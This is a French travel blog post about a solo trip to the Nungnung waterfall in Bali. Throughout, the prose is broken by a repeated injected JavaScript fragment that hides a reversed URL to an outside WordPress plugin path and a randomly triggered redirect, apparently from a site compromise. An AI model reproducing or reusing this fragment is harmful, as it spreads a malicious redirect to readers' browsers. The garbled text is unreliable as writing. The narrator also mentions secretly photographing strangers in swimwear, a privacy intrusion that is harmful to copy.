La cascade de Nungnung

Go faire l’aventurier

Partir 9 mois en Asie seul, ça veut dire que je passe beaucoup de temps avec moi-même. J’en profite de temps en temps pour me caler des aventures solo façon Nathan Drake. Aujourd’hui je suis parti près de Auman à Bali, pour partir à la recherche d’une cascade dans la jungle, la cascade de Nungnung.

Je l’ai découverte au hasard sur Google Maps, j’ai tapé « Waterfall Bali » et elle faisait parti des mieux notées. J’regarde dehors, il fait plutôt beau. C’est à une heure en scooter. J’prends mon GH5, mon trépied et j’décalle (ptdr c’est le nom du site ?).

La route se passe tranquille, j’suis redevenu un expert en pilotage de scooter, ça rappelle les années lycée. La route est longue, j’ai pas tant de batterie que ça sur mon portable, du coup j’me concentre pour me rappeler du chemin pour le retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour. La pluie se ramène alors qu’il me reste 5 minutes de route. Sébastien Loeb s’empare de mon corps et j’arrive en 2 minutes à destination. Je suis content d’être arrivé.

La jungle

Forêt de Nungnung

La brume me rends ouf.

J’entre tranquillement dans la jungle, j’vois un couple de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristes qui a payé un guide, je décide de les suivre pour en profiter aussi. J’m’en foutais de ce que racontais le guide, mais ça me rassurait, j’étais sûre d’aller dans la bonne direction. Le mari a une GoPro sur stabilisateur, j’me décide à sortir mon appareil photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de mon sac, ils me laissent passer. ?

La jungle est magnifique, il pleuvouille, mais sous les arbres ça ne se ressent pas. Depuis le début je ne fais que descendre des escaliers, au bout de 10 minutes j’me dis que je vais pleurer au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour. (No spoil) Je vois au loin une toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute petite cascade, je décide de m’arrêter pour la prendre en photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Je me dis qu’elle n’est pas aussi ouf que la grosse, mais comme j’ai pas encore vu la grosse, si ça se trouve la petite est plus jolie.

petite cascade nungnung

La bébé cascade en question.

Bon, elle est bien choupi cette cascade mais j’entends au loin qu’il y en une vachement plus grosse dans le coin. J’me décide à continuer mon chemin. J’avance 300 mètres, et je croise enfin la grosse cascade. J’vois qu’il y a quelques personnes. Le couple qui m’avait redépassé, trois meufs en string et trois mecs qui les prennent… en photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to hihihihihihi.

La grosse cascade

En faisant genre que j’prenais la cascade en photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to j’ai bien pris quelques photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos des meufs, mais comme j’ai la flemme de flouter les visages, je garde toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout pour moi. La cascade est impressionnante, mais le temps se gâte. Les gens commencent à partir, j’décide de prendre ma petite bâche, j’l’enfile (ouais c’est genre une bâche avec un trou et une capuche), et j’m’installe ici en attendant que la pluie passe. ?

moi sous la pluie

Ça c’est moi qui attend sous la pluie.

J’attends donc tranquillement, 10 minutes passent, le temps ne se calme pas. J’commence à flipper pour mon appareil photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to et j’me tâte à remonter quelques marches pour me mettre sous un abri. À ce moment, je vois deux filles arriver. L’une est très souriante, elle me dit bonjour, je lui répond et elles s’avancent toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les deux vers la cascade. Je suis calé entre deux rochers et je les perds de vue (mais elles sont juste à côté).

Je les oublie et j’décide de sortir ma GoPro pour immortaliser ce moment. J’me décide donc à filmer la pluie. Je montrerais ces images à mes petits enfants et je leur dirait qu’Indiana Jones était inspiré de la vie de leur papy. Ils iront jamais vérifier. ?

La découverte

J’fais donc mes affaires, j’pose ma GoPro en équilibre sur le trépied. J’attends, le bruit de la pluie sur ma bâche commence à me peser. Et sans faire gaffe, j’fais toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomber la GoPro deux mètres plus bas. Qu’est-ce que je découvre en me levant ? La fille qui m’a dit bonjour est nue, et elle se dirige vers la cascade pour se baigner. Sa pote l’attend à côté.

Les deux sont de dos, elles ne m’ont pas vu. J’ai honte et j’me remets à ma place. J’ai bien envie de remonter les marches pour retrouver un abri, mais j’ai pas envie de vivre ce moment gênant, où je fais genre que je ne les ai pas vu, et que je me casse tranquillement. J’décide donc d’attendre qu’elles terminent leurs affaires.

la pluie nungnung

Ce que je vois en attendant qu’elles se barrent.

Au final elles ne restent pas si longtemps. La plus souriante me refait coucou en passant, font un petit selfie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les deux au loin et se cassent. Je peux enfin partir à la recherche d’un abri (#ManVSNungnung).

 

Une heure à regarder la pluie

J’remonte donc les marches, j’trouve un abri rapidement et j’me pose… une heure. Ça va c’était pas chiant, j’ai eu le temps de faire quelques photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos. J’ai essayé de faire la photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to d’une feuille au moment où une goutte toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombe dessus, sans succès. J’m’occupe, j’regarde les oiseaux dans le coin, j’écoute des bruits d’animaux inconnu. Le temps passe finalement rapidement.

La feuille et la goutte

La feuille en question.

J’repars donc rapidement. La cascade n’a pas bougé ?. Cette fois j’étais seul, face à la cascade. J’avais l’impression d’avoir découvert un truc, c’était un moment vraiment cool. La brume s’était emparé de l’endroit, c’était magnifique. J’me pose j’prends mon temps et j’me dis que ça valait le coup d’attendre. La cascade me parait bien énervée, et comme je suis seul et que je ne connais rien à l’endroit, je décide de ne pas rester longtemps. J’avais peur d’être bloqué par une crue ou je ne sais quoi.

Je fais donc mes quelques photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos / vidéos, j’regarde le coin et j’essai de retenir ce moment un peu unique dans ma mémoire. Je décide de partir pour ne pas risquer quelque chose. Et en effet, j’ai galéré à remonter toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les marches. ?

La cascade de Nungnung

Enfin une photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to de la cascade 🙂

Rendez-vous à Gili Air

Article Suivant

2 semaines en Indonésie et Publication du Blog

Article Précédent